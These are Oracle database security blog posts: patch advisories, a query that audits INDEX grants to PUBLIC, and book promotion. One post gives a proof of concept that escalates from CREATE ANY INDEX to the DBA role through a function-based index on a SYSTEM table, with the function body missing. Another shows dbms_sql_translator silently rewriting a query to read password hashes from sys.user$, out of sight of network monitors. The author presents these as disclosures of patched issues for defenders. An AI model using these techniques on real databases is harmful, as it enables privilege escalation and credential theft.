Previous Posts

July Security Alert

Hi Oracle Security Folks,

The July Oracle Security Alert is out. My part is smaller than last quarter as just an In-Depth Credit, but Mr David Litchfield makes a triumphal return with some excellent new research.
There is a CVSS 9 and a remote unauthenticated issue in this patch so worth installing this one. I note that there is normally a dedicated security patch for Linux but the Windows version is part of a Larger Bundle.

So the general advice is that there are still quite a lot of Index Function escalations and it is especially important to check for indexes granted to public on tables owned by privileged users.

For example:

select grantor from dba_tab_privs where privilege='INDEX' and grantee='PUBLIC';

Definitely worth tuning up the monitoring system to alert to unauthorised index usage!

In other news I noticed that the stealth SYS locking feature is now reverted by Oracle in – good move in my view. Maybe some more to come on this in the future.

Additionally the has excellent new In memory feature but watch out for license implications as it is turned on by default.

There is a load more unpatched and unpublished research going round currently but unfortunately cannot discuss here at this time.
However Apress are currently offering my new updated book at a very reasonable price at this URL
Springer are handling paper sales at this URL
Amazon are even offering my book in Kindle format

As time goes on 12c will eventually go out of date, but my “Protecting Oracle” book has material on Privileged Access Control which applies to all version of Oracle moving forward, so I believe you will enjoy the read, and find it a useful investment.

Stay safe,

April 2014 CPU

Hi Oracle Security Folks,

Thanks to Oracle for fixing a batch of research I sent over in August 2013 regarding ADVISOR, DIRECTORIES, GAOP(GRANT ANY OBJECT PRIVILEGE) and also a critical privilege escalation which gains 8.5 in the CPU which I am not going to publish here as I want to give folks time to patch. Both of the issues fixed in the April DB Patch are from myself this time.

Note that that the CVSS 8.5 was not discussed at any conferences – it’s new. Actually the CVSS 8.5 is detailed in my new book which has just come out after the patch release, and is available from Apress and Amazon There is some new exploit research in there but the main thrust of the book is Defense and Protection – especially using Enterprise Manager/Cloud Control to Defend an estate and how to secure privileged access control mechanisms such as breakglass. I am very honored that Jonathan Gennick Edited the book, Arup Nanda Technically Reviewed the book, and that Slavik Markovich – CTO of McAfee – wrote a kind foreword to the book as well. There have also been quite a few other folks involved whom I list in the Acknowledgements section. It’s taken a year to write so hopefully you will like it.

Anyhow more detail to come on that in the future. For now I recommend installing the patch and reading the book…though it has to be said – that was where I was 9 months ago..and the world has not stopped spinning yet…Global SCN still rising :) but hopefully no maximum in sight yet!

Keep safe,


Hello Oracle Security Readers,

If we combine the following factors together then we can identify an escalation route from Index on SYSTEM to SYSDBA which does not require SELECT privileges on the indexed table:

1. SYSTEM passes it’s DBA role through it’s procedures.

2. Oracle indexes allow execution from read via functions i.e. INDEX can execute a function.

3. Oracle analyses indexes before they are used.

The PoC code is below:



create user test identified by o; 
grant create session, create procedure, create any index to test; 

SQL*Plus: Release Production on Wed Dec 11 09:47:26 2013 
Copyright (c) 1982, 2010, Oracle.  All rights reserved. 
Connected to: 
Oracle Database 11g Enterprise Edition Release - Production 
With the Partitioning, OLAP, Data Mining and Real Application Testing options 

SQL> conn test/o 

/  2    3    4    5    6    7    8   
Function created. 

SQL> grant execute on test.y to public; 
Grant succeeded. 

SQL> create index system.escalation_index on system.SQLPLUS_PRODUCT_PROFILE(test.y('name')); 
Index created. 

SQL> set role dba;  
Role set.

So the ability to create an index can lead to SYSDBA. Oracle have made the above more difficult to achieve in 12c by adding an INHERIT privilege requirement which blocks the above code, and therefore represents another good reason to upgrade from 11g to 12c. I discuss this in my new book along with other issues, for publication in April, and already available to purchase in Alpha format at this URL

What sort of defences have organisations been using recently to combat attacks like the above? Surprisingly there has still been a large focus on network monitoring to implement DB Security. I say surprisingly because new DB Sec research has been focused for a while on controlling internal high privilege within the DB. A privileged account can bypass network monitoring even if it is host based. A good example of bypassing a host based network monitor (e.g. SNORT/Guardium et al) is the dbms_sql_translator package introduced with 12c demonstrated below:

conn / as sysdba

SQL> exec dbms_sql_translator.create_profile('BYPASSNETMON');

PL/SQL procedure successfully completed.

SQL> select object_name, object_type from dba_objects where object_name like 'BYPASSNETMON';


SQL> exec dbms_sql_translator.register_sql_translation('BYPASSNETMON','select username from dba_users','select user, password from sys.user$')

PL/SQL procedure successfully completed.

SQL> alter session set sql_translation_profile = BYPASSNETMON;

Session altered.

SQL> alter session set events = '10601 trace name context forever, level 32';

Session altered.

SQL> select username from dba_users;




To achieve this monitoring bypass all that is required is CREATE SQL TRANSLATION PROFILE privilege and ALTER SESSION. Gaining ALTER SESSION has been achievable, as my previous book showed

And there are other methods to gain ALTER SESSION in newer versions of Oracle DB, and the CREATE SQL TRANSLATION PROFILE privilege is only needed at creation time, so verifying that a session is not being translated surreptitiously requires some expertise. More to come on this.

Ready made methods to alert to the unauthorised use of dbms_sql_translator are the native audit trail, or for high security scenarios a memory monitor such McAfee’s DB Sec monitoring tool here provides high protection

There are positives from a security perspective in 12c, and of course with Oracle we can add our own defenses. The new book adds these following protections among others:

  1. Incoming DB Link blocking using Native IPS
  2. Forensic rootkit detection
  3. Break-glass Access Control security
  4. Automated statechecking from root
  5. Adaptive security response using EM12c
  6. Fine grained user management
  7. Centralised audit trail lifecycle
  8. Vulnerability scanning for verification using Perl
  9. Securing privileged access control
  10. 12c decryptions and defenses

Anyway I won’t spoil the surprise – so enjoy your weekends!


Paul M. Wright

P.S. Commenting works now as the Maths Captcha plugin has dealt with the spambots